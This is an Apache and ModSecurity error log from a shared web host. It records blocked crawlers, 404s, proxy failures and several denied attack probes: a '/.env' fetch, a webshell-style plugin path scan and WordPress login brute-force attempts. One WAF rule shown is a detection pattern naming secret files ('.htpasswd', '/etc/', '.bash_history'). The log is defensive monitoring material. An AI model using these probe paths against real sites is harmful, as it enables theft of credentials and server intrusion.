[Tue May 26 17:45:32.463936 2026] [security2:error] [pid 924957:tid 925143] [client 198.244.242.16:15768] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.filosha.com"] [uri "/robots.txt"] [unique_id "ahWO5OYv2AvxeXULfJdi-QAAADg"]
[Tue May 26 17:45:32.464051 2026] [security2:error] [pid 924957:tid 925143] [client 198.244.242.16:15768] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.filosha.com"] [uri "/robots.txt"] [unique_id "ahWO5OYv2AvxeXULfJdi-QAAADg"]
[Tue May 26 17:45:32.890077 2026] [security2:error] [pid 924957:tid 925172] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO5OYv2AvxeXULfJdi-wAAAFU"]
[Tue May 26 17:45:33.976209 2026] [security2:error] [pid 924957:tid 925116] [client 54.39.210.182:45846] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.filosha.com"] [uri "/"] [unique_id "ahWO5eYv2AvxeXULfJdjKgAAAB0"]
[Tue May 26 17:45:33.976320 2026] [security2:error] [pid 924957:tid 925116] [client 54.39.210.182:45846] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.filosha.com"] [uri "/"] [unique_id "ahWO5eYv2AvxeXULfJdjKgAAAB0"]
[Tue May 26 17:45:35.310402 2026] [security2:error] [pid 924957:tid 925168] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO5uYv2AvxeXULfJdjRAAAAFE"]
[Tue May 26 17:45:35.759552 2026] [security2:error] [pid 924957:tid 925106] [client 185.191.171.16:18872] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-4-8/day/2025-03-28/"] [unique_id "ahWO5-Yv2AvxeXULfJdjXAAAABM"]
[Tue May 26 17:45:35.759700 2026] [security2:error] [pid 924957:tid 925106] [client 185.191.171.16:18872] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-4-8/day/2025-03-28/"] [unique_id "ahWO5-Yv2AvxeXULfJdjXAAAABM"]
[Tue May 26 17:45:37.390757 2026] [security2:error] [pid 924957:tid 925208] [client 114.119.156.9:37079] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/nueva/category/sin-categoria"] [unique_id "ahWO6eYv2AvxeXULfJdjiQAAAHk"], referer: https://www.plenitudotonal.com/nueva/2015/02/03/dormir-mal-y-el-modo-de-andar-factores-de-riesgo-de-alzheimer
[Tue May 26 17:45:37.651215 2026] [security2:error] [pid 924957:tid 925093] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO6eYv2AvxeXULfJdjhQAAAAY"]
[Tue May 26 17:45:39.963434 2026] [security2:error] [pid 924957:tid 925146] [client 216.26.229.80:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWO6-Yv2AvxeXULfJdj5QAAADs"], referer: https://anujtradingco.com/
[Tue May 26 17:45:40.020270 2026] [security2:error] [pid 924957:tid 925134] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO6-Yv2AvxeXULfJdj1QAAAC8"]
[Tue May 26 17:45:42.183258 2026] [security2:error] [pid 924957:tid 925140] [client 202.76.140.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO7eYv2AvxeXULfJdkHQAAADU"]
[Tue May 26 17:45:42.338435 2026] [security2:error] [pid 924957:tid 925211] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO7eYv2AvxeXULfJdkIQAAAHw"]
[Tue May 26 17:45:42.429044 2026] [security2:error] [pid 924957:tid 925124] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWO7uYv2AvxeXULfJdkNgAAACU"], referer: https://www.anujtradingco.com/
[Tue May 26 17:45:42.610289 2026] [core:crit] [pid 924957:tid 925174] (13)Permission denied: [client 52.167.144.23:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:45:42.795138 2026] [security2:error] [pid 924957:tid 925121] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWO7uYv2AvxeXULfJdkSAAAACI"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1485550&moderation-hash=143429125451050909be63da8abf2cea
[Tue May 26 17:45:44.657506 2026] [security2:error] [pid 924957:tid 925195] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO8OYv2AvxeXULfJdkcgAAAGw"]
[Tue May 26 17:45:45.952060 2026] [proxy:error] [pid 924957:tid 925147] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:45:45.952120 2026] [proxy_http:error] [pid 924957:tid 925147] [client 84.37.205.34:40568] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:45:45.952703 2026] [proxy:error] [pid 924957:tid 925147] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:45:45.952738 2026] [proxy_http:error] [pid 924957:tid 925147] [client 84.37.205.34:40568] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:45:46.991374 2026] [security2:error] [pid 924957:tid 925101] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO8uYv2AvxeXULfJdkswAAAA4"]
[Tue May 26 17:45:48.110756 2026] [security2:error] [pid 924957:tid 925135] [client 69.48.202.178:59180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWO8-Yv2AvxeXULfJdk0QAAADA"], referer: https://anujtradingco.com
[Tue May 26 17:45:48.392582 2026] [security2:error] [pid 924957:tid 925097] [client 69.48.202.178:59317] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWO9OYv2AvxeXULfJdk3wAAAAo"], referer: https://anujtradingco.com
[Tue May 26 17:45:48.823942 2026] [security2:error] [pid 924957:tid 925150] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO9OYv2AvxeXULfJdk4wAAAD8"]
[Tue May 26 17:45:49.605555 2026] [proxy:error] [pid 924957:tid 925209] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:45:49.605607 2026] [proxy_http:error] [pid 924957:tid 925209] [client 142.147.212.128:5428] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:45:49.606228 2026] [proxy:error] [pid 924957:tid 925209] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:45:49.606264 2026] [proxy_http:error] [pid 924957:tid 925209] [client 142.147.212.128:5428] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:45:51.218581 2026] [security2:error] [pid 924957:tid 925106] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO9uYv2AvxeXULfJdlLAAAABM"]
[Tue May 26 17:45:52.219482 2026] [security2:error] [pid 924957:tid 925087] [client 114.119.142.12:27667] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/sounds-from-the-streets"] [unique_id "ahWO-OYv2AvxeXULfJdlSQAAAAA"], referer: https://www.anujoverseas.in/sounds-from-the-streets
[Tue May 26 17:45:54.147904 2026] [security2:error] [pid 924957:tid 925149] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO-eYv2AvxeXULfJdldQAAAD4"]
[Tue May 26 17:45:54.607296 2026] [security2:error] [pid 924957:tid 925124] [client 114.119.146.197:24497] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.xllent.in"] [uri "/contact-us"] [unique_id "ahWO-uYv2AvxeXULfJdljAAAACU"], referer: http://www.xllent.in
[Tue May 26 17:45:56.337774 2026] [core:error] [pid 924957:tid 925167] [client 195.178.110.48:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:45:56.337804 2026] [core:error] [pid 924957:tid 925167] [client 195.178.110.48:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:45:56.658361 2026] [security2:error] [pid 924957:tid 925141] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO_OYv2AvxeXULfJdlsQAAADY"]
[Tue May 26 17:45:57.368767 2026] [core:error] [pid 924957:tid 925089] [client 195.178.110.48:36908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:45:57.368786 2026] [core:error] [pid 924957:tid 925089] [client 195.178.110.48:36908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:45:57.598402 2026] [security2:error] [pid 924957:tid 925121] [client 164.138.84.72:41724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.84.138.164.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWO_eYv2AvxeXULfJdlzAAAACI"]
[Tue May 26 17:45:57.598590 2026] [security2:error] [pid 924957:tid 925121] [client 164.138.84.72:41724] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWO_eYv2AvxeXULfJdlzAAAACI"]
[Tue May 26 17:45:57.972235 2026] [core:error] [pid 924957:tid 925134] [client 195.178.110.48:36916] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:45:57.972258 2026] [core:error] [pid 924957:tid 925134] [client 195.178.110.48:36916] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:45:58.170479 2026] [security2:error] [pid 924957:tid 925153] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWO_eYv2AvxeXULfJdl1wAAAEI"]
[Tue May 26 17:45:58.296535 2026] [autoindex:error] [pid 924957:tid 925171] [client 150.109.21.93:40122] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:46:01.061217 2026] [security2:error] [pid 924957:tid 925115] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPAOYv2AvxeXULfJdmFQAAABw"]
[Tue May 26 17:46:03.766817 2026] [security2:error] [pid 924957:tid 925168] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPA-Yv2AvxeXULfJdmXQAAAFE"]
[Tue May 26 17:46:05.162491 2026] [security2:error] [pid 924957:tid 925212] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPBOYv2AvxeXULfJdmigAAAH0"]
[Tue May 26 17:46:07.255953 2026] [security2:error] [pid 924957:tid 925208] [client 54.37.118.68:19192] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "operatives.org.in"] [uri "/robots.txt"] [unique_id "ahWPB-Yv2AvxeXULfJdm1QAAAHk"]
[Tue May 26 17:46:07.256058 2026] [security2:error] [pid 924957:tid 925208] [client 54.37.118.68:19192] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "operatives.org.in"] [uri "/robots.txt"] [unique_id "ahWPB-Yv2AvxeXULfJdm1QAAAHk"]
[Tue May 26 17:46:07.980750 2026] [security2:error] [pid 924957:tid 925191] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPB-Yv2AvxeXULfJdm4QAAAGg"]
[Tue May 26 17:46:08.004204 2026] [security2:error] [pid 924957:tid 925200] [client 191.101.157.243:53313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.157.101.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWPB-Yv2AvxeXULfJdm6wAAAHE"]
[Tue May 26 17:46:08.664861 2026] [security2:error] [pid 924957:tid 925118] [client 15.235.96.46:36722] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "operatives.org.in"] [uri "/"] [unique_id "ahWPCOYv2AvxeXULfJdm-AAAAB8"]
[Tue May 26 17:46:08.664999 2026] [security2:error] [pid 924957:tid 925118] [client 15.235.96.46:36722] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "operatives.org.in"] [uri "/"] [unique_id "ahWPCOYv2AvxeXULfJdm-AAAAB8"]
[Tue May 26 17:46:09.860533 2026] [security2:error] [pid 924957:tid 925184] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPCeYv2AvxeXULfJdnEAAAAGE"]
[Tue May 26 17:46:12.802954 2026] [security2:error] [pid 924957:tid 925143] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPDOYv2AvxeXULfJdnZAAAADg"]
[Tue May 26 17:46:15.100140 2026] [security2:error] [pid 924957:tid 925146] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPDuYv2AvxeXULfJdnmAAAADs"]
[Tue May 26 17:46:17.658387 2026] [security2:error] [pid 924957:tid 925198] [client 45.132.227.138:31557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWPEeYv2AvxeXULfJdn4gAAAG8"]
[Tue May 26 17:46:17.682650 2026] [security2:error] [pid 924957:tid 925101] [client 172.98.32.202:29501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWPEeYv2AvxeXULfJdn4QAAAA4"]
[Tue May 26 17:46:18.096506 2026] [security2:error] [pid 924957:tid 925102] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPEeYv2AvxeXULfJdn6QAAAA8"]
[Tue May 26 17:46:18.515276 2026] [security2:error] [pid 924957:tid 924968] [remote 2a0f:d002:f5b:17b5:ae84:c6ff:fe0a:56d5:0] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWPEuYv2AvxeXULfJdn_wAAUgo"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 17:46:18.893369 2026] [security2:error] [pid 924957:tid 925169] [client 2a0f:d002:f5b:17b5:ae84:c6ff:fe0a:56d5:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWPEuYv2AvxeXULfJdn_wAAUgo"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 17:46:19.325522 2026] [security2:error] [pid 924957:tid 925143] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPEuYv2AvxeXULfJdoCwAAADg"]
[Tue May 26 17:46:20.533406 2026] [security2:error] [pid 924957:tid 924976] [remote 74.7.241.58:57612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWPFOYv2AvxeXULfJdoMAAADxI"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/opal-estate-pro/templates/search-box/fields
[Tue May 26 17:46:21.490732 2026] [security2:error] [pid 924957:tid 925145] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPFeYv2AvxeXULfJdoPAAAADo"]
[Tue May 26 17:46:22.281696 2026] [security2:error] [pid 924957:tid 925147] [client 163.172.83.95:50052] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shahvishaal.com"] [uri "/.env"] [unique_id "ahWPFuYv2AvxeXULfJdoXgAAADw"]
[Tue May 26 17:46:23.071611 2026] [security2:error] [pid 924957:tid 924984] [remote 84.247.129.9:58210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWPFuYv2AvxeXULfJdoawAAbBo"]
[Tue May 26 17:46:24.479350 2026] [security2:error] [pid 924957:tid 925100] [client 198.244.242.150:27064] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "landsonlogistics.com"] [uri "/robots.txt"] [unique_id "ahWPGOYv2AvxeXULfJdojwAAAA0"]
